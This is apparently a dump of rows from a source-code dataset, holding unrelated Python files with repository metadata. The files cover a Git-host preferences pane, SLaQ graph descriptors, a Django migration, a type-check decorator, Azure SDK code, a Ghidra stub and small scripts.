from envisage.ui.tasks.preferences_pane import PreferencesPane
from traits.api import Str, Password, Button, Color, Bool
from traitsui.api import View, Item, VGroup, HGroup
from pychron.core.ui.custom_label_editor import CustomLabel
from pychron.envisage.tasks.base_preferences_helper import (
BasePreferencesHelper,
test_connection_item,
)
from pychron.git.hosts import authorization
from pychron.globals import globalv
class GitHostPreferences(BasePreferencesHelper):
username = Str
password = Password
oauth_token = Str
default_remote_name = Str
organization = Str
disable_authentication_message = Bool
test_connection = Button
_remote_status = Str
_remote_status_color = Color
def _test_connection_fired(self):
self._remote_status_color = "red"
self._remote_status = "Invalid"
try:
kw = {"verify": globalv.cert_file}
if self._token:
header = authorization("", "", self._token)
kw["headers"] = header
else:
kw["auth"] = (self.username, self.password)
resp = requests.get(self._url, **kw)
if resp.status_code == 200:
self._remote_status = "Valid"
self._remote_status_color = "green"
except BaseException as e:
print("exception", e, self._url)
class GitHubPreferences(GitHostPreferences):
preferences_path = "pychron.github"
_url = "https://api.github.com/user"
@property
def _token(self):
if self.oauth_token:
return "token {}".format(self.oauth_token)
class GitLabPreferences(GitHostPreferences):
host = Str
preferences_path = "pychron.gitlab"
@property
def _url(self):
return "https://{}".format(self.host)
@property
def _token(self):
if self.oauth_token:
return "Bearer {}".format(self.oauth_token)
class GitHostPreferencesPane(PreferencesPane):
def _cred_group(self):
g = VGroup(
Item("organization"),
# VGroup(Item('username'),
# Item('password'),
# show_border=True, label='Basic'),
Item(
"disable_authentication_message",
tooltip="This message is displayed to Windows users on start up as a reminder to setup "
"authentication",
label="Disable Authentication Message",
),
VGroup(
Item(
"oauth_token",
tooltip="Enter a Personal Access Token",
resizable=True,
label="Token",
),
show_border=True,
label="OAuth",
),
HGroup(
test_connection_item(),
CustomLabel(
"_remote_status", width=50, color_name="_remote_status_color"
),
),
show_border=True,
label="Credentials",
)
return g
def traits_view(self):
v = View(
self._cred_group(), Item("default_remote_name", label="Default Remote")
)
return v
class GitHubPreferencesPane(GitHostPreferencesPane):
model_factory = GitHubPreferences
category = "GitHub"
class GitLabPreferencesPane(GitHostPreferencesPane):
model_factory = GitLabPreferences
category = "GitLab"
def traits_view(self):
hg = VGroup(Item("host"))
v = View(VGroup(self._cred_group(), hg))
return v
# ============= EOF =============================================
| [
"jirhiker@gmail.com"
] | jirhiker@gmail.com |
d44084bd0082b1994125b02a466cdac8bbb39e1c | e10a6d844a286db26ef56469e31dc8488a8c6f0e | /graph_embedding/slaq/slaq.py | c5b398335c01701b00c343f9a6e09a7eb1c38303 | [
"Apache-2.0",
"CC-BY-4.0"
] | permissive | Jimmy-INL/google-research | 54ad5551f97977f01297abddbfc8a99a7900b791 | 5573d9c5822f4e866b6692769963ae819cb3f10d | refs/heads/master | 2023-04-07T19:43:54.483068 | 2023-03-24T16:27:28 | 2023-03-24T16:32:17 | 282,682,170 | 1 | 0 | Apache-2.0 | 2020-07-26T15:50:32 | 2020-07-26T15:50:31 | null | UTF-8 | Python | false | false | 4,522 | py | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Main SLaQ interface for approximating graph descritptors NetLSD and VNGE."""
import numpy as np
from scipy.sparse.base import spmatrix
from graph_embedding.slaq.slq import slq
from graph_embedding.slaq.util import laplacian
def _slq_red_var_netlsd(matrix, lanczos_steps, nvectors,
timescales):
"""Computes unnormalized NetLSD signatures of a given matrix.
Uses the control variates method to reduce the variance of NetLSD estimation.
Args:
matrix (sparse matrix): Input adjacency matrix of a graph.
lanczos_steps (int): Number of Lanczos steps.
nvectors (int): Number of random vectors for stochastic estimation.
timescales (np.ndarray): Timescale parameter for NetLSD computation. Default
value is the one used in both NetLSD and SLaQ papers.
Returns:
np.ndarray: Approximated NetLSD descriptors.
"""
functions = [np.exp, lambda x: x]
traces = slq(matrix, lanczos_steps, nvectors, functions, -timescales)
subee = traces[0, :] - traces[1, :] / np.exp(timescales)
sub = -timescales * matrix.shape[0] / np.exp(timescales)
return np.array(subee + sub)
def _slq_red_var_vnge(matrix, lanczos_steps,
nvectors):
"""Approximates Von Neumann Graph Entropy (VNGE) of a given matrix.
Uses the control variates method to reduce the variance of VNGE estimation.
Args:
matrix (sparse matrix): Input adjacency matrix of a graph.
lanczos_steps (int): Number of Lanczos steps.
nvectors (int): Number of random vectors for stochastic estimation.
Returns:
float: Approximated von Neumann graph entropy.
"""
functions = [lambda x: -np.where(x > 0, x * np.log(x), 0), lambda x: x]
traces = slq(matrix, lanczos_steps, nvectors, functions).ravel()
return traces[0] - traces[1] + 1
def vnge(adjacency,
lanczos_steps = 10,
nvectors = 100):
"""Computes Von Neumann Graph Entropy (VNGE) using SLaQ.
Args:
adjacency (scipy.sparse.base.spmatrix): Input adjacency matrix of a graph.
lanczos_steps (int): Number of Lanczos steps. Setting lanczos_steps=10 is
the default from SLaQ.
nvectors (int): Number of random vectors for stochastic estimation. Setting
nvectors=10 is the default values from the SLaQ paper.
Returns:
float: Approximated VNGE.
"""
if adjacency.nnz == 0: # By convention, if x=0, x*log(x)=0.
return 0
density = laplacian(adjacency, False)
density.data /= np.sum(density.diagonal()).astype(np.float32)
return _slq_red_var_vnge(density, lanczos_steps, nvectors)
def netlsd(adjacency,
timescales = np.logspace(-2, 2, 256),
lanczos_steps = 10,
nvectors = 100,
normalization = None):
"""Computes NetLSD descriptors using SLaQ.
Args:
adjacency (sparse matrix): Input adjacency matrix of a graph.
timescales (np.ndarray): Timescale parameter for NetLSD computation. Default
value is the one used in both NetLSD and SLaQ papers.
lanczos_steps (int): Number of Lanczos steps. Setting lanczos_steps=10 is
the default from SLaQ.
nvectors (int): Number of random vectors for stochastic estimation. Setting
nvectors=10 is the default values from the SLaQ paper.
normalization (str): Normalization type for NetLSD.
Returns:
np.ndarray: Approximated NetLSD descriptors.
"""
lap = laplacian(adjacency, True)
hkt = _slq_red_var_netlsd(lap, lanczos_steps, nvectors,
timescales) # Approximated Heat Kernel Trace (hkt).
if normalization is None:
return hkt
n = lap.shape[0]
if normalization == 'empty':
return hkt / n
elif normalization == 'complete':
return hkt / (1 + (n - 1) * np.exp(-timescales))
elif normalization is None:
return hkt
else:
raise ValueError(
"Unknown normalization type: expected one of [None, 'empty', 'complete'], got",
normalization)
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
3fc64ef0e80d80509d96c399a394a6be9418809f | 53fa2c914dd1183c7ba8a2c5f564e0c0c1cbaedd | /Gym/web_athlete/migrations/0015_auto_20180804_1844.py | 920df02025b7d21d684f49208b13ebbc56544c88 | [
"MIT"
] | permissive | ahmadreza-smdi/GymManagement | 718c8dbeddc968097643a413b2ad7d882d0b864f | 03f4d6d7b8d8ebefc70c2e921b64888afc3e6b28 | refs/heads/master | 2021-06-19T14:56:41.021617 | 2019-11-24T20:58:56 | 2019-11-24T20:58:56 | 142,736,163 | 6 | 1 | MIT | 2021-06-10T20:43:43 | 2018-07-29T06:20:07 | Python | UTF-8 | Python | false | false | 1,347 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-08-04 18:44
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('web_athlete', '0014_auto_20180804_1801'),
]
operations = [
migrations.AddField(
model_name='time_option',
name='username',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
migrations.AlterField(
model_name='class_times',
name='Open_times',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='web_athlete.Time_option'),
),
migrations.AlterField(
model_name='fields',
name='class_time',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='web_athlete.Class_times'),
),
migrations.AlterField(
model_name='member',
name='field',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='web_athlete.Fields'),
),
]
| [
"ahmadreza.smdi@gmail.com"
] | ahmadreza.smdi@gmail.com |
443e27562eaab35764faa3c919b8368e9c63009e | 064190a2de1ad156e1060f0efdee7e754a96b4bb | /9.7.py | 32b4343aa60f537c7519d6b2836ff21ac1c9f9cf | [] | no_license | zqy1/pythonCookbook | 7254fadf3fac277b107941bc32e4716de3f7c329 | 89a05a2a4d723fb49548e0e87d2542bd5d07fbee | refs/heads/master | 2020-08-03T17:27:09.351396 | 2015-09-18T13:05:14 | 2015-09-18T13:05:14 | 73,540,483 | 1 | 0 | null | 2016-11-12T08:14:50 | 2016-11-12T08:14:50 | null | UTF-8 | Python | false | false | 1,366 | py | # -*- coding: utf-8 -*-
"""
9.7.py
~~~~~~
利用装饰器对函数参数进行强制类型检查
"""
# 函数签名对象的应用
from inspect import signature
from functools import wraps, partial
def typeassert(*ty_args, **ty_kwargs):
def decorate(func):
if not __debug__:
"""如果不是调试模式,不进行参数检查"""
return func
sig = signature(func) # sig 返回函数有关参数返回值信息 --> 签名
# 利用 bind_partial 函数将参数值与类型绑定
bound_types = sig.bind_partial(*ty_args, **ty_kwargs).arguments
@wraps(func)
def wrapper(*args, **kwargs):
bound_values = sig.bind(*args, **kwargs)
# 强制类型检查
for name, value in bound_values.arguments.items():
if name in bound_types:
if not isinstance(value, bound_types[name]):
raise TypeError(
'Argument {} must be {}'.format(name, bound_types[name])
)
return func(*args, **kwargs)
return wrapper
return decorate
# 使用这个装饰器
# 通过参数指定类型检查
@typeassert(int, int)
def add(x:int, y:int) -> int:
print (x + y)
# test1
add(2, 4)
# test2
add('neo1218', 5)
# test3
add(3, y=6)
| [
"neo1218@yeah.net"
] | neo1218@yeah.net |
5fcfd400e2e36486c52783aa82476ba6e3b3c8ae | 107fdd20682510440fc002c5b26ce6d51227d23d | /p49_misc/p49b_wave_evol.py | a30801b43baef3bcc3028dfa78aad20ca2dccb16 | [] | no_license | dcollins4096/ytscripts | bddb1a82b30d533e5789a16109dca9226713c76d | 52d8337dbbcba5d004663ec2cd1d2a15503c952d | refs/heads/master | 2022-07-29T07:44:18.847626 | 2022-07-18T13:17:11 | 2022-07-18T13:17:11 | 185,677,619 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,258 | py |
if 'ef' not in dir():
execfile('go')
for i in range(3):
print("====================")
import enzo_write
reload(enzo_write)
import p49_eigen
reload(p49_eigen)
import p49_plot_tools
reload(p49_plot_tools)
import matplotlib.colors as colors
def nz(field):
nz = np.abs(field) > 1e-13
return field[nz]
frame_list=[0]
this_formt = 'png'
get_from='ic'
#plot_style = 'r_theta'
#plot_style = 'proj'
plot_style = 'hist_tot'
if 1:
if 'lazy_ds' not in dir():
lazy_ds = {}
for frame in frame_list:
if 1:
if 0:
this_name = 'y701'
directory = '/Users/dcollins/scratch/Paper49b_play/Eigen/y701_rb96_fft_f-_play'
if 0:
this_name = 'r801'
directory = '/Users/dcollins/scratch/Paper49b_play/Eigen/r801_rj95_110_f-'
if 0:
this_name = 'rA01'
directory = '/Users/dcollins/scratch/Paper49b_play/Eigen/rA01_rb96_110_f-'
if 1:
this_name = 'rB01'
directory = '/Users/dcollins/scratch/Paper49b_play/Eigen/rB01_rb_several'
#frame//wave//xy//xz//yz?//real//imag//magnitude//phase
#https://matplotlib.org/users/colormapnorms.html
plt.close('all')
if frame not in lazy_ds:
if get_from=='yt':
ds = lazy_ds.get(frame,yt.load("%s/DD%04d/data%04d"%(directory,frame,frame)))
stuff = p49_eigen.get_cubes_cg(ds)
#lazy_ds[frame]=stuff
elif get_from=='ic':
this_name = 'rB01_ic'
stuff = p49_plot.tools.chomp(directory=directory)
else:
print("Extant Stuff")
#lazy_ds[frame]=ds
else:
stuff = lazy_ds[frame]
print_fields = False
print_waves = True
#these_means = stuff['means']
#these_ffts = p49_eigen.get_ffts(stuff['cubes'], these_means)
#kall,wut=p49_eigen.rotate_back(these_ffts, these_means)
#kmag = (kall[0,...]**2+kall[1,...]**2+kall[2,...]**2)**0.5
if plot_style == 'hist_tot':
oname = '%s_%04d_hist.%s'%(this_name, frame, this_formt)
p49_plot_tools.plot_wave_mag(stuff=stuff,output_name=oname)
"""
fig = plt.figure(figsize=(8,8)) # Notice the equal aspect ratio
fig.suptitle('%s_%04d %s'%(this_name,frame,wave))
#ax = [fig.add_subplot(1,1,i+1) for i in range(6)]
ax = [fig.add_subplot(1,1,1,projection='polar')]
for a in ax:
a.set_xticklabels([])
a.set_yticklabels([])
a.set_aspect('equal')
all_angle = np.angle(this_fft)
flag = np.abs(this_fft) > 1e-9
this_kmag = kmag[flag]
this_angle = all_angle[flag]
oname = '%s_%04d_%s_rtheta.%s'%(this_name, frame, wave, this_formt)
ax[0].scatter(this_angle, this_kmag)
for a in ax:
a.set_rmax(16)
fig.savefig(oname)
print(oname)
"""
if plot_style == 'r_theta':
p49_plot_tools.plot_k_rad(wut=wut,prefix="%s_%04d"%(this_name,frame))
if plot_style == 'proj':
p49_plot_tools.plot_k_proj(wut=wut,prefix="%s_%04d"%(this_name,frame))
if 0:
#old shit?
#Test. Frame 0 has only f-.
frame = 0
directory = '/Users/dcollins/scratch/Paper49b_play/Eigen/y701_rb96_fft_f-_play'
ds = yt.load("%s/DD%04d/data%04d"%(directory,frame,frame))
stuff = p49_eigen.get_cubes_cg(ds)
these_means = stuff['means']
these_ffts = p49_eigen.get_ffts(stuff['cubes'], these_means)
print_fields = False
print_waves = True
kall,wut=p49_eigen.rotate_back(these_ffts, these_means)
fl = np.zeros_like(wut.wave_frame['d']).astype('bool')
if print_fields:
for field in wut.wave_frame:
print(" ===== %s ===="%field)
thisthing = wut.wave_frame[field]
thisthing = wut.dumb[field]
this_bool = np.abs(thisthing) > 1e-13
#fl = np.logical_or(fl, this_bool)
nonzeros = len( this_bool )
print(" eigen %s"%str(tsfft.right['f-'][field]))
print(" rot %s"%str(tsfft.rot[field]))
print("all_hat %3s %s"%(field, nz(tsfft.all_hats[field])))
aaa = these_ffts[field] #is good.
print("also fft input k %3s %s"%(field, str(nz(aaa).size)))
print("this wave frame k %3s %s"%(field, str(nz(thisthing).size)))
if print_waves:
for wave in wut.wave_content:
thisthing = wut.wave_content[wave]
bang_or_not = ""
if ( np.abs(thisthing)>1e-12).sum() > 0:
bang_or_not = "!!!"*8 + " meann %0.2e max %0.2e"%(np.mean(np.abs(thisthing)),np.abs(thisthing).max())
print("=== Wave %s %s"%(wave, bang_or_not))
s1 = str(nz(thisthing.real).size)
s2 = str(nz(thisthing.imag).size)
print("wave real nz %s imag %s"%(s1,s2))
| [
"none@none"
] | none@none |
41a662baf31d2a62914571ab1a7592adfc372ea5 | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_6/wrtjos001/question4.py | af7b9aca381af051a7c7950504ed8316f3d9ed66 | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 699 | py | """Assignment 6 Question 4 histogram reprentation of marks
joshua wort
20 april 2014"""
#get list of marks
mark=input("Enter a space-separated list of marks:\n")
marks=mark.split(" ")
#variables
F=""
third=""
lower_second=""
upper_second=""
first=""
#sort marks into categories
for mark in marks:
if eval(mark)<50:
F+="X"
elif eval(mark)<60:
third+="X"
elif eval(mark)<70:
lower_second+="X"
elif eval(mark)<75:
upper_second+="X"
else:
first+="X"
#print histogram
print("1 |",first,sep="")
print("2+|",upper_second,sep="")
print("2-|",lower_second,sep="")
print("3 |",third,sep="")
print("F |",F,sep="")
| [
"jarr2000@gmail.com"
] | jarr2000@gmail.com |
6cc0276162bd2ed931565851eac5f8bd360435a6 | 87ac76b8aae5bf1c8a1530cd317972e4cf54fd62 | /azext_iot/sdk/dps/service/models/device_capabilities.py | 271a4829262e4d8e1f1b373d3572d394b0ccbf2c | [
"MIT"
] | permissive | montgomp/azure-iot-cli-extension | 911dbb10bb27d1b4ba2446fad4e37014c99bea6e | 7dee61b369f5dd7c7b9753edfc87b8ed35841c72 | refs/heads/dev | 2023-08-28T18:58:16.052628 | 2021-10-21T21:13:11 | 2021-10-21T21:13:11 | 271,131,011 | 1 | 1 | NOASSERTION | 2020-08-05T15:56:03 | 2020-06-09T23:30:08 | Python | UTF-8 | Python | false | false | 1,094 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class DeviceCapabilities(Model):
"""Device capabilities.
All required parameters must be populated in order to send to Azure.
:param iot_edge: Required. If set to true, this device is an IoTEdge
device. Default value: False .
:type iot_edge: bool
"""
_validation = {
'iot_edge': {'required': True},
}
_attribute_map = {
'iot_edge': {'key': 'iotEdge', 'type': 'bool'},
}
def __init__(self, **kwargs):
super(DeviceCapabilities, self).__init__(**kwargs)
self.iot_edge = kwargs.get('iot_edge', False)
| [
"noreply@github.com"
] | montgomp.noreply@github.com |
878bf8ebbffb082312d112adc9e428be9d482b7c | aa0270b351402e421631ebc8b51e528448302fab | /sdk/containerservice/azure-mgmt-containerservice/generated_samples/managed_clusters_start.py | 72576c0ff6c89fa7ed554926a27a70117d305085 | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | fangchen0601/azure-sdk-for-python | d04a22109d0ff8ff209c82e4154b7169b6cb2e53 | c2e11d6682e368b2f062e714490d2de42e1fed36 | refs/heads/master | 2023-05-11T16:53:26.317418 | 2023-05-04T20:02:16 | 2023-05-04T20:02:16 | 300,440,803 | 0 | 0 | MIT | 2020-10-16T18:45:29 | 2020-10-01T22:27:56 | null | UTF-8 | Python | false | false | 1,579 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.containerservice import ContainerServiceClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-containerservice
# USAGE
python managed_clusters_start.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = ContainerServiceClient(
credential=DefaultAzureCredential(),
subscription_id="subid1",
)
response = client.managed_clusters.begin_start(
resource_group_name="rg1",
resource_name="clustername1",
).result()
print(response)
# x-ms-original-file: specification/containerservice/resource-manager/Microsoft.ContainerService/aks/stable/2023-03-01/examples/ManagedClustersStart.json
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | fangchen0601.noreply@github.com |
01784bb1eed1a0d1dc4408f4dfd22848c152afd1 | 786027545626c24486753351d6e19093b261cd7d | /ghidra9.2.1_pyi/ghidra/app/plugin/core/datamgr/actions/DeleteArchiveAction.pyi | 40829decee32b762b3894713f6a134b1ed84c7c4 | [
"MIT"
] | permissive | kohnakagawa/ghidra_scripts | 51cede1874ef2b1fed901b802316449b4bf25661 | 5afed1234a7266c0624ec445133280993077c376 | refs/heads/main | 2023-03-25T08:25:16.842142 | 2021-03-18T13:31:40 | 2021-03-18T13:31:40 | 338,577,905 | 14 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,409 | pyi | import docking
import docking.action
import ghidra.util
import java.beans
import java.lang
import java.util
import java.util.function
import javax.swing
class DeleteArchiveAction(docking.action.DockingAction):
def __init__(self, __a0: ghidra.app.plugin.core.datamgr.DataTypeManagerPlugin): ...
def actionPerformed(self, __a0: docking.ActionContext) -> None: ...
def addPropertyChangeListener(self, __a0: java.beans.PropertyChangeListener) -> None: ...
def createButton(self) -> javax.swing.JButton: ...
def createMenuItem(self, __a0: bool) -> javax.swing.JMenuItem: ...
def dispose(self) -> None: ...
def enabledWhen(self, __a0: java.util.function.Predicate) -> None: ...
def equals(self, __a0: object) -> bool: ...
def firePropertyChanged(self, __a0: unicode, __a1: object, __a2: object) -> None: ...
def getClass(self) -> java.lang.Class: ...
def getDefaultKeyBindingData(self) -> docking.action.KeyBindingData: ...
def getDescription(self) -> unicode: ...
def getFullName(self) -> unicode: ...
def getHelpInfo(self) -> unicode: ...
def getHelpObject(self) -> object: ...
def getInceptionInformation(self) -> unicode: ...
def getKeyBinding(self) -> javax.swing.KeyStroke: ...
def getKeyBindingData(self) -> docking.action.KeyBindingData: ...
def getKeyBindingType(self) -> docking.action.KeyBindingType: ...
def getMenuBarData(self) -> docking.action.MenuData: ...
def getName(self) -> unicode: ...
def getOwner(self) -> unicode: ...
def getOwnerDescription(self) -> unicode: ...
def getPopupMenuData(self) -> docking.action.MenuData: ...
def getToolBarData(self) -> docking.action.ToolBarData: ...
def hashCode(self) -> int: ...
def isAddToPopup(self, __a0: docking.ActionContext) -> bool: ...
def isEnabled(self) -> bool: ...
def isEnabledForContext(self, __a0: docking.ActionContext) -> bool: ...
def isValidContext(self, __a0: docking.ActionContext) -> bool: ...
def markHelpUnnecessary(self) -> None: ...
def notify(self) -> None: ...
def notifyAll(self) -> None: ...
def popupWhen(self, __a0: java.util.function.Predicate) -> None: ...
def removePropertyChangeListener(self, __a0: java.beans.PropertyChangeListener) -> None: ...
def setDescription(self, __a0: unicode) -> None: ...
def setEnabled(self, __a0: bool) -> None: ...
def setHelpLocation(self, __a0: ghidra.util.HelpLocation) -> None: ...
def setKeyBindingData(self, __a0: docking.action.KeyBindingData) -> None: ...
def setMenuBarData(self, __a0: docking.action.MenuData) -> None: ...
def setPopupMenuData(self, __a0: docking.action.MenuData) -> None: ...
def setSupportsDefaultToolContext(self, __a0: bool) -> None: ...
def setToolBarData(self, __a0: docking.action.ToolBarData) -> None: ...
def setUnvalidatedKeyBindingData(self, __a0: docking.action.KeyBindingData) -> None: ...
def shouldAddToWindow(self, __a0: bool, __a1: java.util.Set) -> bool: ...
def supportsDefaultToolContext(self) -> bool: ...
def toString(self) -> unicode: ...
def validContextWhen(self, __a0: java.util.function.Predicate) -> None: ...
@overload
def wait(self) -> None: ...
@overload
def wait(self, __a0: long) -> None: ...
@overload
def wait(self, __a0: long, __a1: int) -> None: ...
| [
"tsunekou1019@gmail.com"
] | tsunekou1019@gmail.com |
7873a3bafeebce9c3624c8c3a5b2b8862708fd5e | 61ef327bd1d5ff6db7595221db6823c947dab42b | /FlatData/EndCondition.py | 6c4cf20c8a8847cbbfba3d3009e7e7918cb49579 | [] | no_license | Aikenfell/Blue-Archive---Asset-Downloader | 88e419686a80b20b57a10a3033c23c80f86d6bf9 | 92f93ffbdb81a47cef58c61ec82092234eae8eec | refs/heads/main | 2023-09-06T03:56:50.998141 | 2021-11-19T12:41:58 | 2021-11-19T12:41:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 248 | py | # automatically generated by the FlatBuffers compiler, do not modify
# namespace: FlatData
class EndCondition(object):
Duration = 0
ReloadCount = 1
AmmoCount = 2
AmmoHit = 3
HitCount = 4
None_ = 5
UseExSkillCount = 6
| [
"rkolbe96@gmail.com"
] | rkolbe96@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.